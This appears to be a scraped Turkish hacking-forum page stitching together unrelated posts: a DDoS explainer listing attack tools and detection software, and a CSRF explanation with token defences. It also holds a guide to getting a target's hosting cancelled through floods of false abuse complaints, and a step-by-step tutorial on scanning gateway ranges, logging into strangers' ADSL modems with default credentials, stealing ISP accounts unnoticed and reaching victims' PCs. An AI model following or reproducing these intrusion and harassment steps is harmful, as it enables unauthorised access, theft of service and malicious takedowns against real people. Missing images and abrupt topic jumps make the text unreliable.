şikayetin yoğunluğu önemlidir en az 6-7 mail ile deneyiniz amacınıza ulaşacağınızı belirtirim ilk olarak uyarı olur spam şikayetlerinin ardı arkası kesilmeyince hadi kardeşim kendine yeni bir host bul diyerek serverle hedefteki kişinin ilişiğini kesecektir. Ne kadar hedef kişi itiraz etse de hosting hizmetini verirken imzalattığı sözleşmeye dayanarak atacaktır serverden. Geri ispatlaması baya uğraş verir ama biz amacımıza ulaşmış oluruz.

Birkaç örnek verdim olayın genel mantığını anlamanız açısından kısacası Biz kötüye kullanımı bildir bölümünü kötüye kullanmış oluyoruz genel mantık budur.

Kolay gelsin.

Code Cracking"e Giriş

Bu özet kullanılabilir değil. Yayını görüntülemek için lütfen burayı tıklayın.

DDoS (Distributed Denial Of Service) Nedir, Nasıl Yapılır - 2

Tarama işlemi sonucunda oluşturduğu LOG dosyasında detaylı bilgileri barındırır.
Eğer Windows sistemi altından networkünüzü kontrol etmek istiyorsanız DDoSPing isimli programı kullanabilirsiniz. Bu programı www.foundstone.com adresinde bulabilirsiniz.

DDoSPing%202.0




Sisteminize yapılan DDoS ataklarına karşı yararlanabileceğiniz programlardan biri ZombieZapper isimli programdır. Programın kaynak kodu aşağıda verilmiştir. Ayrıca programı http://www.razor.bindview.com adresinden download edebilirsiniz.
ZombieZapper, zombie kurulmuş sistemlerden kaynaklanan yoğun trafiğin durdurulması için kullanılmaktadır. Bu programın Trinioo, TFN, Stacheldraht, Trinioo for Windows ve Shaft DDoS araclarına karşı etkili olduğu belirtiliyor. ZombieZapper yazarları network yöneticilerinin bu programı kullanarak kendi network'lerinden veya dışarıdaki bir sistemden kaynaklanan flood saldırılarının tespit edilip, durdurulabileceği belirtilmekte.

DDoS (Distributed Denial Of Service) Nedir, Nasıl Yapılır.

DDoS atakları servis sağlayıcılarının korkulu rüyalarından biridir. DDoS tipi saldırılar özellikle büyük firmaların bu tür saldırılardan etkilenmesi DDoS adını ön plana çıkardı. Bu türden ilk saldırılar Avustralya ve Avrupada meydana geldi, fakat bu ataklarla ilgili kayda geçen ilk saldırı Minnesota Üniversitesine karşı yapılan saldırılardır (17 Ağustos 1999). Daha sonra saldırılar gitgide artmaya başladı. Yapılan çeşitli araştırmalar DDoS türü saldırılarda artma gözlenmiştir.

DoS ve DDoS atakları özellikle 2001 yılında online ticaret kuruluşlarına yapıldığı görülmektedir. Vnunet (www.vnunet.com) haberlerinde, internet kullanıcıları ve e-ticaret site yöneticileri bu tür saldırılara karşı uyarmıştı. Internet Security Systems (ISS) yüzlerce bilgisayara zombi adı verilen ajanların yüklendiğini belirten haberler yayınlamıştı. Bu küçük ajanlar sayesinde sisteme sızan kimseler, serverlara çok sayıda veri göndererek serverların(sunucu) çökmesine neden olmaktadır. Bu saldırıdan etkilenen Yahoo, Amazon ve eBay gibi ünlü internet portallarının çökmesine ve milyonlarca dolar zarar uğramasına neden olmuştu. Computer Security Institue (CSI, www.gocsi.org) anketine katılanlardan bir e-ticaret sitesi sahibi olanların %55'i DDoS saldırılarına maruz kaldıklarını belirttiler. DoS atakları sadece e-ticaret ve web servislerine yapılmamaktadır. Bu saldırılardan routerlar, sanal özel ağlar(VPN) ve IRC sunucularıda etkilenmektedirler. Bir servis sağlayıcının router'ına yapılacak bir saldırı sonucu network trafiği altüst olabilir ve sonucundada müşterilerinin bağlantıları kopabilir. Daha önce en büyük IRC ağlarından Undernet'in bazı önemli sunucuları DDoS yöntemiyle çökertilmişti. Saldırıda servis sağlayıcılar saniyede yüzlerce MB veri bombardımanına tutulmuştu.

DDoS saldırıları nasıl gerçekleşmektedir?

Atak anında kişi, kendini gizlemek için önceden sızdığı bilgisayarlara 'zombi' adı verilen küçük programcıkları yerleştirir. Böylece kendini saklama fırsatı elde eder. Ataklar bu zombiler üzerinden yaparak birden fazla bilgisayarı istediği hedefler üzerine veri bombardımanı yapabilir. Yüzlerce/binlerce bilgisayarlara yerleştirilen zombiler, bilgisayarlara uzaktan kontrol (remote) imkanı vererek, bu bilgisayarlar üzerinden istedikleri server'a çok sayıda veri göndererek, server'i sistem dışı bırakıyor. Böylece saldırganlar, saldırıları başka insanların bilgisayarları üzerinden gerçekleştirdiği için saptanmaları zor hale gelmektedir.
DDoS yöntemi genel olarak sistemlere belli bir düzen çerçevesinde farklı noktalardan saldırarak server'i hizmet dışına bırakma yoludur. Bir bilgisayar server'a kendi adresini yanlış veren bir veri paketi yolluyor. Server, bilgisayarın verdiği adrese geri bilgi vermek için ulaşmaya çalıştığında adrese ulaşamıyor. Bu esnada server bağlantıyı kapatmadan bir müddet bekliyor. Bu tür bağlantı isteklerinin milyonlarcası server'a yapıldığında server işlemez hale gelmektedir.

'Zombiler'
DDoS ataklarını gerçekleştirirken yakalanmamak için "zombi" denilen küçük programcıkların kullanıldığından söz etmiştik. Ataklar bu zombiler üzerinden gerçekleştirilerek aynı anda birden fazla bilgisayarın hedeflere yönlendirilmesi sağlanarak, saldırıyı yapan kişinin IP adresininde gizlenmesi sağlanır. Zombiler genellikle güvenliği zayıf olan sistemlere yerleştirilirler. Yani hack'lenen sisteme yerleştirilen zombiler kendi bünyesindeki daemonlar vasıtasıyla belirli bir porttan (1524 tcp, 27665 tcp, 2744 udp, 31335 udp, 33270 tcp) gelecek olan DDoS isteklerini gerçekleştirirler. Ayrıca daha çok Unix ve Linux tabanlı sistemlerde zombiler kullanılsada Windows tabanlı sistemlerde de zombiler kullanılmaktadır.

DDoS için kullanılan araçlar:
_ Trinoo(Trin00)
_ The Tribe Flood Network (TFN)
_ Stacheldraht
_ Trinity
_ Shaft
_ Tribe Flood Network 2K (TFN2K)
_ MStream


DDoS ataklarından korunmak için;
Bu ataklar fark edildiğinde atakta bulunan adresten gelen bağlantı isteklerinin iptal edilmesi gerekir. Ayriyeten özel yazılım ve donanım kullanılarak saldırıların önüne geçme imkanı vardır. Şirket ve bireysel kullanıcılar, güvenlik politikalarını belirleyerek, müdahale tespit (intrusion detection) gibi yöntemlere başvurmalı. Ayrıca saldırının başladığı an saldırının merkezi tespit edilerek, o merkezin servis sağlyıcısıyla irtibata geçmek ve erişimi engellemek gerekiyor.

Sisteminizde bir DDoS aracının kurulup kurulmadığını tespit etmek istiyorsanız find_ddos isimli programı kullanabilirsiniz. Bu programı bulabileceğiniz adres:
http://www.nipc.gov/warnings/alerts/1999/find_ddos_v42_linux.tar.Z
Sistemde tespit edebildiği DDoS araçları:
* mstream master
* mstream server
* stacheldraht client
* stacheldraht daemon
* stacheldraht master
* tfn-rush client
* tfn client
* tfn daemon
* tfn2k client
* tfn2k daemon
* trinoo daemon
* trinoo master
Bu programı root yetkisinde çalıştırın.

Eğer sisteminizde DDoS aracı kurulmuşsa aşağıdakine benzer bir çıktı ile karşılaşma olasılığı vardır.

[root@CiLeK find]# ./find_ddos

Logging output to: LOG
Scanning running processes...
Scanning "/tmp"...
Scanning "/"...

/DoS/TFN/tfn: tfn client
/DoS/TFN/tfn-rush: tfn-rush client
/DoS/TFN/td: tfn2k daemon

ALERT: One or more DDOS tools were found on your system.
Please examine LOG and take appropriate action.

Csrf Saldırıları

CSRF, hemen hemen XSS ile zıt mantıkta çalışır.Birince hedef sunucudur, birinde istemci.Bu atak şeklinde, sahte HTTP istekleri söz konusudur.Kullanıcı farkında olmadığı halde, yönetim paneline sahip olduğu siteden bir üyeyi silebilir, bir alışveriş sitesinden bir şeyler satın alabilir.Gelelim bu işin nasıl olduğuna;

Bir site admini düşünün, ve admin arkadaşımız yönetim panelinden 67 nolu üyeyi silmek istediğinde panel üzerinde yaptığı istek x.com/uyesil.php?uye_id=67 gibi bir sayfayı açması yetiyor.Yani adminimiz tarafından yapılan x.com/uyesil.php?uye_id=67 isteğinde 67 nolu üye silinecek.

Şimdi admin arkadaşımızın başka bir siteye girdiğini düşünelim.O sitede de şöyle bir HTML kodu var;

Kod:




Bu HTML kodu, sayfada gözükmeden x.com/uyesil.php?uye_id=67 adresine HTTP isteğinde bulunuyor.

Normalde, admin haricinde herhangi bir saldırgan x.com/uyesil.php?uye_id=67 gibi bir HTTP isteğinde bulunduğunda yönetim panelinin olağan şifre yönetimi nedeniyle herhangi bir zararda bulunamayacak.Fakat ilgili yönetim panelinde, yönetici oturum bilgilerine sahip ( session ) olan adminimiz, bu siteye girdiğinde istemediği halde 67 no'lu üyeyi silmiş olacak.Ve büyük ihtimalle bunun farkında da değil.

Bu durum bir çok uygulamada mevcut, hatta öyleki google adsense şifreleri CSRF yardımıyla değiştirilebiliyor, digg.com sahte digg istekleri ile kandırılabiliyordu.

Nasıl Önlem Alacağız?

CSRF'yi önlemenin en bilinen ve en sağlam yolu, token ( anahtar ) modelidir.Herhangi bir form düşünün, form sayfası her açıldığında rastgele bir sayı veya string üretiyoruz ve bunu anahtar olarak hafızaya kaydediyoruz.Daha sonra aynı anahtarı veritabanına anahtarlar şeklinde kaydediyoruz.

Form işleme sayfasına geldiğinde, session'daki anahtarı veritabanındaki anahtarla kontrol ediyoruz.Eğer gerçekten böyle bir anahtar mevcutsa işlemi yapıyoruz, aksi taktirde işlemi durduruyoruz.

CSRF ile yapılan isteklerde, form kısmına hiç giriş yapılmayacağı için anahtar session'a kayıt edilmeyecektir.Dolayısıyla, form işleme sırasında CSRF ile yapılan sahte istek geçersiz kalacaktır.

Betik, form açıldığında rastgele bir değer üretip hem session'a hem veritabanına kaydediyor. Form'un işlendiği bölümde session'dan gelen değer ile veritabanındaki anahtarlar kontrol ediliyor, eğer kayıtlı bir anahtar ise kabul ediliyor. ve anahtar bir daha kullanılmamak üzere veritabanından siliniyor.

Aynı mantığı ASP ve diğer web programlama dillerinde uygulabilirsiniz.

Bunun dışında almanız gereken önlemler;

Form iletişiminde GET değil POST kullanın.
*PHP kullanıyorsanız, $_POST dizisini kullanın.Zira register_globals ile exploit edilebildiği sürece form iletişiminde POST kullanmanızın önemi kaybolur.

Adsl Account Çalmak

Giriş:

Bu dökümanda size adsl accountu çalmayı anlatacağım. Unutmayın çalacağınız account hızınızı değiştirmez. Sadece beleşe girersiniz. Kotalı adsl kullananlar bu sayede mağdur olmazlar...

Öncelikle bu işlem için gerekli olan programları Tahribat.Com Download arşivinden çekin. çekin.

*SuperScan

*Revaliation
1-) Super Scan adlı yazılımı açıyoruz ve "Port List Setup" a girelim




2-) "Port List Setup" sekmesinden 21, 23, 80 adlı portları açalım (resimdeki gibi yeşil tickli olacak) Sonra bunu "Save" sekmesine tıklayrak kaydedelim. Bu port listesini kullanacağız.



3-) Şimdi geldik önceden hazırladığımız port listesindeki, port aralıklarını taratmaya. Kendi ipinizi üstteki kutucuğa("Start") yazın. Daha sonra "1..254" butonuna basın alttaki "Stop" kutucuğunu kendisi türetecektir böylece kendi gateway'inizi taramış olursunuz. Çok fazla adsl almak için arkadaşlarınız iplerini alın ve aynı işlemleri uygulayın. Ben bir gateway'i tarattım. Yanında "+" işareti olan Ip adreslerinde bizim tarattığımız port veya portlar açıktır demektir. "+" ya tıklıyoruz böylece hangi portun açık olduğu ortaya çıkıyor.

Örnekte inceleyelim:



Ben örnek olarak "85.99.99.39" Ip adresini seçiyorum. Gördüğünüz gibi aradığımız 3 portta açık. Şimdi Ip adresine Mouse'umuzla sağ tıklıyoruz ve "Ftp", "Telnet" "Web Browse" gibi seçenekler geliyor karşımıza. [Not: 80 portu Internet explorer veya browserlar için, 23 portu Microsoft Telnet için, 21 portu ise Ftp içindir, sağ tıklayıp seçeceğinizi ona göre yapın.]

Öncelikle Telnet'ten bağlanıp modemin markasını görmem lazım ayrıca Telnette login olursak şifreyide değişteribiliriz. Öncelikle Telnetle bağlanıyoruz ve Login girişi ve şifreyi soruyor. Her türlü Marka Modemin kurulum şifrelerini almak için buraya tıklayın Şimdi bizim şansımıza bunun markası zoom çıktı

login: admin

şifre: zoomadsl

Giriş yapıyoruz. Istersek modem şifresinide değiştirebiliriz. Aşağıdaki şekilde gördüğünüz gibi:




Şifremizi değiştirdik. Şimdi madem bu modemin 80 portu açık, hemen ip adresini browsera(Internex explorer, firefox, vb..) yapıştırıyoruz. Kullanıcı adı ve şifre istiyor.

Kullanıcı adı: admin

Şifre: değiştirdiysek değiştirdiğimiz. Değiştirmediysek modem markası yerinden öğreniyoruz.(Not: Telnetten girince modem markası yazar direk browser'dan girince marka yazmaz.Elinde sonunda Telnetten bir bakış atmak zorundayız.) ve Evet karşımıza ayarlar çıktı.



Artık adsl accountu çalmış olduk :)

http://adslkota.ttnet.net.tr/selfcare/login.jsp bu adresten şifreyi kontrol edebilirsiniz. Ayarları değiştirmemenizi tavsiye ederim. Şifreyi değiştirirseniz adam uyanır böylece yeni şifre ulaştırırlar adama. Boşuna çalmış olursunuz.

*Modem ayarlarına girdik gördüğünüz gibi, oralarda port açabilmekte olması lazımdı :) eğer port açabilirseniz. Telnetten "o IPADRESI [açılan port] " diyerek pcye sızabilirsiniz.